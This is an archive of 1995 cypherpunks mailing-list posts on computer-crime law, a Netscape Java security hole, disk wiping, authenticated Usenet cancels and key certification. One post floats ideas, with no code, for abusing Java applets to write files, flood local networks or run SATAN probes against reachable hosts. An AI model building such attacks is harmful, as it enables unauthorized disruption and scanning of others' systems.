The US statutes state (as far as I can tell) that any unauthorized use
of a federal interest computer (which includes any computer connected to
an Interstate communications system) in excess of $500 is a felony. 
There is no requirement for mens re (criminal intent) at this point
either.  This is one of the things many people disagree with in the
US vs. Morris case of 1988.

> 	Ah, but that guy was distributing "anarchistic" information: he
> must have been pretty bad intentioned then. No one should have "unauthorized
> ideas" and even less dare to distribute or share them. I see.
> 
> 	Great that if someone complains about the distribution of 'X' kind
> of ideas there's always a willing sysadmin to hunt the witch instead of
> defending freedom of speech. Great.

Again you miss the target.  Just because the anarchist information got
the attention of the systems administrator doesn't mean that this had
anything to do with the law that was (perhaps) broken.  It could have
been cooking instructions for BLT sandwiches - the law doesn't
differentiate - but those who enforce the law are concerned about
terrorism and insurrection, so they look at those cases sooner than the
others.

> >> have different last names, Gorrie concluded a larger hacker conspiracy
> >> was afoot.
> >
> >Reasonable assumption.  The only way to find out different would be to
> >violate the users' privacy by reading their mail, etc.
> >
> 	What? May I suggest that, if the account has a owner, and a system
> manager, and all that, those people should be asked prior to jumping to
> conspiracy theories? The same kind of reasoning lead many innocents to die
> with the Spanish Inquisition: hey, they were plotting with the devil against
> god laws. Sorry, but I think a phone call to the implicated persons can
> easily clear all those doubts without "electronic surveillance" as you propose.

The comparison of this case to the Spanish inquisition is just not
relevent or in any way valid.  When you use someone else's account on a
computer and that use is not authorized byt he owners or their
designated assignees, you are risking prosecution.  If a sysop catches
you doing it, it is, presumably, their job to investigate, call in
proper authorities, and so on. 

> >Collected possible evidence.  A good idea.  Allerting potential criminals
> >
> 	Yeah. I suppose that if they were expressing distrubing ideas, they
> were "potential criminals"... What else could they possibly be?

No, the actor was a criminal because of the unauthorized access, not
because of the ideas being expressed.  However, given that we have two
criminals, one who is expressing ideas about better BLT sandwich
recepies and one who is expressing ideas about anarchy, the priority in
the investigation will almost certainly go to the one expressing ideas
about anarchy - because of the perception by law enforcement (valid or
not) that anarchists are more likely to blow up federal buildings than
chefs.

> >If he turned out to be a terrorist who was planning to blow up a
> >building, you would have called this a tremendous piece of police work,
> >they could have written a million-selling book, and you would hail the
> >sysadmin as a computer age hero.
> >
> 	Great! I guess that prettily summarizes all: "if" he had turned to
> be a "fill in your fears here". Just the same as it was with the Inquisition,
> if they were good guys they shouldn't fear torture or dying for God. And it
> was better to torture innocents than allowing any "potential bad guy" to get
> along.

Again, your analogy goes way too far for the reality here. 
Investigation is not "torture or dying" - and the investigation found
that a crime may have been committed, so the person was arrested and, in
the end, the result came to having to pay the approximate cost of the
unauthorized services taken.  It just doesn't sound like the Spanish
inquisition to me.

> >So Hirsh agreed that he had been illegally using the computer system
> >and the case was settled with a monetary fine.
> >
> 	I bet so. Under torture many innocents also confessed. And faced with
> a multimillion dollar trial which, if you can't afford- will take you to
> jail (which can be a real torture), I guess that most innocents will prefer
> to go along with a smaller fine.
...

You make a lot of assumptions here - like that Hirsh was tortured by
being arrested - that he was raped in jail - and that he was arrested
for the ideas he was expressing.

This is a lot of hogwash. 

Being tortured is nothing like being taken to a Canadian jail (with the
possible exception of having to eat the food - but he got out before
that became a necessity).  When you use someone's computer - just as
when you use their car - without permission, you risk being arrested.
That is what he was arrested for, as far as I can tell.

If you don't want to be arrested, don't use other peoples' accounts!
It's wrong, it's illegal, and if I catch you doing it on my computer, I
will try to have you arrested as well. 

...

> Look, I don't really know about the case. But I do really understand one thing:
> if this guy hadn't posted what some person considered were "pernicious ideas"
> he would have never been tracked down, villipendiated and taken to trial.

Right - if you are going to break the law, don't call attention to
yourself.  If you do, they will try to catch you.  Otherwise, they
may not even notice you.

> I don't care about if he was using public resources for something they shouldn't
> be. That's something else to be discussed. Is it wrong to use a University
> to spread ideas, specially when the mainstream media avoid them? I won't
> comment on that.

That is the only issue here as far as I can tell.  The rest is just a
smoke screen to try to excuse people from their social responsibility.
It's like saying Robin Hood didn't break the law because he gave what he
stole to the poor.  In Robin's case their may have been a legaly valid
excuse (something about a necessity defense), but in this case, there
was no such thing. 

Why do you claim that it is acceptable to break the law if you post
anarchist ideas when it is not acceptable when you post BLT recepies?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:23:42 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
Message-ID: <199510100022.UAA24707@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As much as I agree with Duncan on this topic, it really isn't
cypherpunks material. We are getting very far afield of
cryptography. Could we please take this to private mail or
talk.politics.libertarian or some such?

Duncan Frissell writes:
> 2400 Americans are imprisoned every year for federal income tax 
> violations.  Approximately one person is killed every year in arrests 
> involving federal income tax violations.  Millions of man-years are spent 
> annually in involuntary servitude to comply with tax laws.  Public 
> employees should be aware of the fact that their contribution to society 
> is of such low value that it will not be paid for without a gun to the 
> customer's head.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 20:10:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9f30750f02100475a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 AM 10/10/95, Rob L wrote:
>> > We mustn't forget that, until very recently, strong, widespread
>> > privacy has been humanity's "default" condition.
>>
>> Not much privacy in village or tribal life.  Even neighborhoods of
>> earlier cities weren't very private.  Neighbors always knew your business.
>>
>
>Big difference is that your neighbors were usually looking out for you..
>not waiting to catch you doing something wrong..
>Even in the small town I live in, there is considerable privacy even
>though everyone knows everyone else.. people tend to keep their noses out
>of others business.. of course, if you offer to talk, then its fair game
>for the side of the road interrogations <g>

Ah, a very astute comment!

Indeed, my chief concern--speaking for myself--is not hiding my activities
from my neighbors, who, by the way, share my distaste for high taxes, big
government, etc., but in ensuring that the various enforcement agencies are
not aware of my activities.

(And even then, my concern is a bit abstract, as I'm not--take my word--a
pot grower, a money launderer, an arms dealer, or a terrorist. I have
violated some laws about obtaining necessary permits, such as the ones
needed to run a computer consulting firm in one's home, but I don't fear a
pre-dawn raid by the jack-booted thugs over this.)

Priuacy is mostly needed to protect against the government, or those who
inform to the government, because it is manifestly the government that
throws people in jail for doing "illegal" things, not one's neighbors.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:43:28 PDT
To: cypherpunks@toad.com
Subject: Java bugs found?
Message-ID: <199510100042.UAA24769@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone from Netscape care to comment?

------- Forwarded Message

Date: Mon, 09 Oct 95 14:12:41 -0400
From: Andrew Wason <aw@bae.bellcore.com>
To: java-interest@java.sun.com
Subject: Re: Netscape 2.0b1 for Win95

Terence Chr Haddock <haddock@UDel.Edu>  writes:
>
>       Where is the 32-bit version of Netscape2.0? I can only find the
> 16-bit. This may be because I have only been able to get on ftp4,ftp5,
> and not ftp.netscape.com. Sorry if this is a stupid question.

Netscape pulled all the 2.0 betas that supported Java yesterday,
due to a recently discovered Java security hole.  So the 32 bit
Windows versions, SunOS, Solaris and SGI versions were removed.
There was a README explaining this there last night, but I can't
find it today.

Andrew

_______________________________________________________________________________

Andrew Wason                                       Bell Communications Research
aw@bae.bellcore.com                                Piscataway, NJ
- -
Note to Sun employees: this is an EXTERNAL mailing list!
Info: send 'help' to java-interest-request@java.sun.com


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 18:13:28 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <Pine.SOL.3.91.951009171543.13562H-100000@chivalry>
Message-ID: <9510100110.AA25989@all.net>
MIME-Version: 1.0
Content-Type: text


> > taken on an impossible task. Marcus Ranum has noted that you can't
> > trust a program thats bigger than a couple of pages long, and I

Marcus agreed with a position founded on the work in the late 70s and
early 80s by many researchers on proving the security of operating
systems under the Bell-Lapadula model.  The main result I recall is that
a Cray-1 took 24 hours to prove the Simple Security Property about a
100-line limited-Pascal program used as the core of (I think it was)
UCLA-secure Unix.  Complexity goes up quickly with program size, and this
property is only one of many you might like to prove.

> For the general case this is true. To be able to trust larger systems, you
> need to not only be able to trust the individual 2 pagers, but to also be
> able to show that composing the sub units doesn't lose whatever property
> you're trying to do.
...
> Distributed co-operative theorem proving, anyone?

Let's go - I will provide the distribution mechanisms, and I think I
know someone who is interested in the theorem proof side.  I know of
several experts on theorum proving who may well pitch in.  What program
do you want to prove secure next (we're currently finishing up my secure
Web server).

...
> Real point of the message:
> 
> In my previous message, I left out some fundamental parts of the run-time 
> that need to be looked at carefully. The garbage collection needs to be 
> examined carefully. Normally GC algorithms are formally derived, so it's 
> the implementation that needs to be checked for. holes in the GC may be 
> too unpredictable to exploit for anything but core-dumping, especially since 
> java uses a mark-sweep conservative collector. 

The core dumping shows that Java can ALSO write files into the file
system, something it was claimed to NEVER be able to do! If you could
get the right name for the core file, and set up the first few bytes
right, ... 

> A more promising area of attack might be the Thread system. If the thread
> system can be confused, it might be possible to have an untrusted app
> start executing in the context of a trusted thread. This may or may not 
> be exploitable, depending on how much of the untrusted threads context 
> gets held over (call stack, etc), but could be fun if it works.

Why not start much simpler.  Write a Java program to disrupt services by
flooding the local network with garbage packets - or with some sort of
request it lets you write. How about a Java program that launches SATAN
probes against all reachable hosts?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 9 Oct 95 19:24:06 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <9510100110.AA25989@all.net>
Message-ID: <Pine.SUN.3.90.951009211225.21188A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Mon, 9 Oct 1995, Dr. Frederick B. Cohen wrote:

> The core dumping shows that Java can ALSO write files into the file
> system, something it was claimed to NEVER be able to do! If you could
> get the right name for the core file, and set up the first few bytes
> right, ... 
> 

Please stop and go read the documentation and papers off sun's web site.
Who ever said that Java cant write to file are not in their right mind.
Those who belive it are more so. Java is a programming language. It can
certanly write to files. Now whatever an interpreter (in this case called
by HotJava or Netscape ) allows the application to do is another thing.
You can as well distribute binary C programms but before running them
try to examine it to see if access the filesystem. (You might even hack
your kernel or libraries to stop any process with certain flag from doing 
so). Java just makes this easier. You can even set up the HotJava browser 
to do no security check at all. All depends in the security model you choose.
Dito for net connections or anything else.

Now if all of you would please go use the product or learn more about it 
before bashing it I would not have to waste my time reaplying to this.

> Why not start much simpler.  Write a Java program to disrupt services by
> flooding the local network with garbage packets - or with some sort of
> request it lets you write. How about a Java program that launches SATAN
> probes against all reachable hosts?
> 

See about. Read the hotjava man page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Mon, 9 Oct 95 13:57:45 PDT
To: cypherpunks@toad.com
Subject: GISA budget: millions for cryptanalytic machine
Message-ID: <m0t2Opo-000BIgC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



According to `die tageszeitung' of 7 Oct 1995, last year the German
Information Security Agency was granted several million marks for buying a
computer to decrypt telecommunications traffic for the secret service BND.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 18:41:09 PDT
To: mkj@october.ducktown.org
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <199510091458.AA00712@october.ducktown.org>
Message-ID: <Pine.SUN.3.91.951009213604.29453B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Oct 1995 mkj@october.ducktown.org wrote:

> We mustn't forget that, until very recently, strong, widespread
> privacy has been humanity's "default" condition.

Not much privacy in village or tribal life.  Even neighborhoods of 
earlier cities weren't very private.  Neighbors always knew your business.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Mon, 9 Oct 95 22:39:08 PDT
To: jlasser@rwd.goucher.edu
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510100538.AA05032@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jon Lasser 

(1) It is impossible to stop these technologies; someone on the list 
recently reminded us that a bright fourteen year old could reproduce the 
basic functionality of PGP in a brief period of time.  The mathematics 
of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw 
multiplication of prime numbers, don't you?
..........................................

Uh-huh, yes, I think it's dumb to think of outlawing the right of mental 
creatures to engage their faculties to their full potential, especially in a 
country which defined encroachments upon it as a crime.

"Unreasonable" people will always try to get something for nothing, with 
nothing, while in conflict with those who could & would develop the means to 
deliver it.

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Mon, 9 Oct 95 22:53:45 PDT
To: cypherpunks@toad.com
Subject: Fully Qualified Domain Name
Message-ID: <95Oct9.225333pdt."16398(3)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Was there a recent discussion here about how to write a piece of UNIX code that
discovers a Fully Qualified Domain Name of the machine running the code?  If
so, I'd appreciate pointers to or copies of the good parts (I scanned
http://www.hks.net/cpunks/cpunks-19/subject.html and didn't find what I'm
seeking).  If not, sorry for wasting your time.

Thanks,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Oct 95 22:57:23 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510100557.WAA10779@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>>PC Tools has a wipe program that will either wipe individual files, or
>>wipe all unallocated diskspace. It also allows you to choose the level
>>of wipe (single overwrite, multiple, etc).

At 12:24 PM 10/9/95 -0400, Robert Hettinga wrote:
>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....

I wrote the disk wipe program in PC Tools.  It really no kidding 
wipes stuff.

The only way they can recover the data is if they take a scanning tunneling
microscope the disk platter, and even then they could only recover small
random fragments.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 9 Oct 95 22:44:47 PDT
To: cypherpunks@toad.com
Subject: Re: Making it more difficult to forge cancels (was: Re: FORGED CANCELS of posts on n.a.n-a.m)
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <cgJqcD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4571p9$kf5@kruuna.helsinki.fi>, wirzeniu@cc.Helsinki.FI (Lars Wirzenius) writes:
>dlv@bwalk.dm.com (Dr. Dimitri Vulis) suggests that cancels be authenticated
>so that only the actual poster could cancel them.  He notes that this
>would make it impossible for moderators to cancel forgeries, but says
>they could use NoCeM notices instead.
>
>Speaking as the moderator of comp.os.linux.announce: No way!
>
>NoCeM doesn't work, since most people have never even heard of it.
[Valid criticisms of NoCeM skipped]
>(Approval forging can fairly easily be made very difficult: the moderator
>digitally signs the articles, and all major news servers are fixed to
>drop all other articles on the floor.  The problems with this approach
>are that on the one hand, upgrading a lot of news servers to the new
>software is a bit of work, and on the other hand, even digital signatures
>may be, or become illegal in parts of the world.  But that just might
>be a reason to implement it now.  There's work being done on it, as a
>matter of fact.)

Sorry for the belated follow-up -- I was far away, and now have a backlog to
sort out.

I've discussed the Hujskonen-Franz proposal some time ago with the beautiful
Simona Nass from Panix and the Society for Electronic Access, and she made the
following suggestion: let each party that wants to be able to authorize cancels
add their own separate Cancel-lock: headers. The cancel/supersede should be
honored if its Cancel-key header matches any one of the Cancel-lock challenges.

I think adding multiple Cancel-lock: headers, any single one of which needs to
be matched, to the Hujskonen-Franz proposal will address _some of the concerns
expressed by Bill Stewart last week, by Lars Wirzenius, and by CancelMoose
him/herself in http://www.cm.org/about-cancels.html about the ability of
moderators to cancel postings in their own newsgroups.

Scenario 1.

Alice posts an article from a computer owned by Bob, an Internet provider.
Bob wants to reserve the right to cancel Alice's account and Alice's Usenet
postings without Alice's permission if Alice misbehaves (e.g., spams).

Alice posts:
]From: alice@bob's.box
]Newsgroups: alt.sex
]Subject: Call me at 1-800-xxx-xxxx for a good time
]Message-id: X (123@bob's.box)
]Cancel-Lock: M2_a

where M2_a is the one-way H(X + M1_a), and M1_a is H of the article and of
Alice's secret passphrase.

Bob, being the sysadmin and the owner of his box, configures his news-posting
software to add automatically a second challege, in addition to Alice's:

]Cancel-Lock: M2_b

where M2_b is the one-way H(X + M1_b), and M1_b is H of Alice's article and of
_Bob's secret passphrase.

Bob asks Alice nicely to cancel the article, since such ads are not appropriate
on alt.sex. Alice may comply and issue a cancel with the header

]Cancel-Key: M1_a

which will be honored. But if Alice refuses, Bob can issue a cancel/supersede
with the header:

]Cancel-Key: M1_b

which should likewise be honored because H(X + M1_b) matches one of the two
challenges in the posted article.

Note 1: If Alice doesn't add a Cancel-Lock, and Bob does, then Alice won't be
able to cancel her own article.

Note 2: It may be a good idea to put comments on the challenges:

]From: alice@bob's.box
]Newsgroups: alt.sex
]Subject: Call me at 1-800-xxx-xxxx for a good time
]Message-id: X
]Cancel-Lock: M2_a ; alice@bob's.box
]Cancel-Lock: M2_b ; root@bob's.box


Scenario 2.

Alice submits an article to Bob, a moderator of a moderated newsgroup:

]Newsgroups: rec.food.cannibalism
]Subject: How to cook elementary school children
]Message-id: X
]Cancel-Lock: M2_a

where M2_a again is H(X + M1_a), and M1_a is H of the article and of Alice's
secret passphrase.

Bob, being either the sole moderator, or a team member, adds an approval and a
second challege, in addition to Alice's:

]Approved: Bob
]Cancel-Lock: M2_b

where M2_b is the one-way H(X + M1_b), and M1_b is H of Alice's article and of
a secret passphrase used by Bob or by the entire moderating team.

Later Bob can cancel this article by specifying
]Cancel-Key: M1_b
Alice too can cancel this article by specifying
]Cancel-Key: M1_a
(unless Bob has stripped Alice's challenge before posting her submission)
and Alice's sysadmin can cancel it too if he added his own challenge (third).

I personally don't think that Bob should be allowed to cancel Alice's article
after he approved it, but that's between Alice and Bob; if she doesn't like it
either, she can post her articles elsewhere.

Now, if Alice injects an article with "Approved:" and entirely bypasses Bob,
(Lars Wirzenius's main conern), then Bob should post a PGP-signed NoCeM notice
and try to yank Alice's feed, or have the site that continues to permit Alice
to do this to be widely aliased. IMVHO, when this happens, the problem is
much deeper than just having the unauthorized article removed.

If and when NoCeM becomes widely accepted, most sites can be expected to honor
signed 'Action: hide' requests from newsgroup moderators in their groups.


Scenario 3.

Alice provides dial-up Usenet feed to/from several small sites run by Bob,
Charles, and Dan. Their domains point to Alice via MX. Alice knows that if one
of them spams Usenet, she'll be flamed and mailbombed. Alice adds her own
"Cancel-Lock:" to each article she receives from these sites before feeding
them to the rest of Usenet. Later she can cancel whatever articles have
originated at B, C, D, and passed through her site.

If Bob, Charles, and Dan don't want Alice to be able to cancel their articles,
or if Alice adds other headers in the articles that pass through her site that
they don't like, then they can look for another feed.


Please note that I don't claim credit for these proposals: I'm just repeating
others' ideas which I happen to like a lot. I hope some civic-minded person(s)
will write patches for the common posting/server software, and compose an RFC
for the Cancel-Lock:/Cancel-Key: headers. One nice feature about the Hujskonen-
Franz proposal that it can be adopted gradually: some sites can continue to
honor all cancels, while others can choose to start honoring only authenticated
cancels, and to help track down forged cancels that fail authentication.

P.S. I saw a NoCeM notice from Chris Lewis with Action:hide/Type: copyright,
for someone's Usenet article that, I think, quoted his private e-mail (?).
I wonder if CancelPoodle's NoCeM's for the Top $ekret $ientology $tuff will
follow soon. :) (And the NoCeM documents should probably be updated to
support new types: copyright, libel, flame, inappropriate, ... :) :)

:-) ObMoosePoem: :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-)
Moose, Moose, wonderful Moose!
Gets rid of nasty spam.
So fond of the Moose I am.
Hooray for the wonderful Moose!
:-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 9 Oct 95 15:42:04 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510092114.AA24726@alpha>
Message-ID: <21628.9510092240@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



I have been following this MITM argument, and find the reasons for
the presentation of some of the arguments confusing.

I'm near certain everyone of those arguing understands public key, and
the use of out of band channels (physical meeting, paper mail,
alternate information provider, plastering public key hashes (eg PGP
fingerprints) everywhere by all comms mediums available, etc) to build
a web of trust, and hence reduce chances of a MITM.

I think I have seen two roughly equivalent views of the relationships
between keys and names presented, and these could be sumarised:

a) a person has-a key

 ("has-a" in an entity relationship diagram sense -- it is somthing
  that a person posses), that person may or may not choose to go by
  their true name, whilst using that key)

a) a key has attributes one of which could (optionally) be a true name

both cases use the same techniques of using all available out of band
comms channels, to make life as tough as possible for the MITM.

So far so good.

Now the puzzling stuff is people who appear to be arguing that MITM is
unimportant, and the whole thing revolves around some relativistic
world view, and it somehow doesn't matter if there is an eavesdropper
so long as you have not yet discovered this.

As it quite clearly does matter, and I can't see how that view
provides anything useful, I assume that there is some theoretical
point these people are trying to make which I fail to grasp.

Anyone care to fill me in as to what this concept is?

Perhaps the view is based on the fact that there are plenty of
situations where you don't care what an entities name is, and hence
the attribute which should be under discussion is credit worthiness,
or reliability, but still you need to protect against MITM, using
whatever channels and means available.  I don't see how this alters
the argument.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 20:51:59 PDT
To: cypherpunks@toad.com
Subject: Re: Java bugs found?
Message-ID: <199510100349.XAA20771@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510100145.SAA00403@lux.reich.com>, Richard_Reich@reich.com
(Richard Reich) wrote:

> After I noticed the file had been pulled, I recovered its contents from my 
> netscape cache (thanks, netscape!):
> 
>   Netscape was notified on Sunday 10/8/95 by Sun Microsystems that there
> is a serious security hole in their Java system [...]

So much for guaranteed security. There is one question on my mind. Why do
today's programs have to try to do it all? Why the heck does a
wordprocessor have to ship with a compiler built in? Not to mention that
there seems to be a disturbing tendency to "feature" automatic execution
of arbitrary code submitted by third parties.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHntWioZzwIn1bdtAQHqMgGAmc0lpXKiDZPCxZxFmQOKvgwm8Y/RRFca
rTfkfyvbdofFklrivaMy+tuuLddZRHo8
=lnto
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:21:26 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510100721.AAA20944@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....

Doing it _right_ is not a trivial job.  Consider disk controllers that
map out bad blocks so the OS never needs to see them - if you're trying
to remove highly classified data, the fact that Diskwipe won't ever see them
might be a serious problem, even if it is close enough for government work.

For a more realistic scenario, consider Stacker and other disk-compression
software;
you don't know what physical blocks the file was written on, or whether
overwriting
the logical blocks of the file will actually write to the same physical blocks.
In some cases you can assume that it probably won't.  You also can't expect to
write large blocks of 1s or 0s over the disk, because disk compression will
turn them into small blocks with run-lengths or equivalent.  (Writing PRNG
random noise will do, or you can generate counter-based patterns that may work,
or do something cryptographically strong if you want to take the time.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:22:09 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
Message-ID: <199510100721.AAA20956@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:46 AM 10/9/95 -0700, Hal wrote:
>>This doesn't necessarily eliminate certificates - while you have a signed
>>statement from Alice's key that she uses Bank Account X, and a signed
statement
>>from Alice's key authorizing transfer of $D from Bank Account X to Bank
>>Account Y,
>>the Bank, or a customer, may refuse to accept the request unless there's 
>>a signed statement from the Bank's key that Alice's key uses Account X.
>>None of these need Alice's name, or for that matter the Bank's, as long as
>>there's
>>also a signed attribute statement from the Bank's key that it's a bank, etc. 
>>The meaning of the certificates changes a bit, but there's still a certificate
>>from the bank binding Alice's Key to Alice's Bank Account.
>
>I can see using keys with attributes in this way, for credentials or as
>other forms of authorization.  But what about for communications privacy?
>What is the attribute that tells you that using this key will prevent
>eavesdropping?

What I was trying to get at with this post was that the assertion that key-
centered communications probably won't require certificates is incorrect.

As far as privacy goes, this set of keys and certifications lets you create
private communications (using signed DH, etc.) with the entity that owns
the private key for Bank Account X.  No, you don't know if that entity
is really Alice or really MITM; in fact you don't know Alice's name, if it's
done right.  You just know that the Bank says it will honor requests for money
from Bank Account X (assuming you know where to find the Bank, which is a
separate
but similar problem.)  So assuming you're selling politically correct
widgets and not
pharmaceuticals or financial privacy consulting services, you probably don't
care too much about who's on the other end - the person who's giving you
the money is the person you want to be talking to.

I'm not trying to define away the MITM problem - I think there _are_ times you
want to know for sure who you're talking to - but I think there are also a lot
of times that you really don't care, as long as you have continuity and
access to reputations of long-persisting identities, where the key is often
enough identification.

In the case of the Bank, the reason you trust the Bank isn't that you know
them physically (though it was interesting when I started dealing with a
local bank where the tellers knew me by name after only two or three visits);
knowing your local Savings and Loan by name doesn't guarantee you can get any
money out of them if there's a bank run, nor does it really guarantee that they
won't embezzle the funds and head for Argentina.  The reason you trust them
is that they (in this case the "they" identified by their key) are doing
business
dealings with a lot of people and it's more profitable not to abscond.
And the reason you know it's really the Bank and not MITM is that they've
always identified themselves by their key from the beginning.
Just like the credit card who's owner we've been calling Alice has.
And because you've successfully withdrawn money from the Bank before,
and because you're clearing Alice's credit card transaction reasonably promptly.

Checks and credit cards are especially good examples for this - the current
systems need your name on them, because your name and signature are the
closest they have to an authentication system.  However, with digital
signatures,
the fact that you can sign a document verifiable by the public key is
all the authentication that's needed; your name isn't.  If the card has an
account number for convenience, and Alice substitutes Carol's account number
for hers on a statement, her signature won't match the public key the bank
wants on the request, and it'll bounce.  (In this case, the certificate
from the bank would probably include the account number as well as the key,
but it's not critical for on-line systems, just more efficient.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 9 Oct 95 23:26:08 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510081722.KAA10011@jobe.shell.portal.com>
Message-ID: <199510100626.AAA20036@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  Hal <hfinney@shell.portal.com> wrote:
> Eventually it seems that
> the MITM becomes enmeshed so deeply in his own lies that he would get
> caught.  If steps like these are taken successfully it should be
> reasonable to sign a nym's key, with the semantics being that either this
> is the real key of the sender, or he has a nearly omnipotent MITM
> surrounding him.


Let's think of ways to foil Mitch:


1.  Physical body (a.k.a. "True Name") mapping.
2.  The "overload his processors" trick.
3.  Sending hashes of future messages.
4.  Sending your public key to the Web O Trust via multiple, 
independent channels.
5.  Working an identifier of your public key into conversation so that
Mitch can't edit out your public key without changing the whole
conversation.  (E.g. "I talked to her a number of times equal to the
least significant 4 bits of my public key."  This is an example which
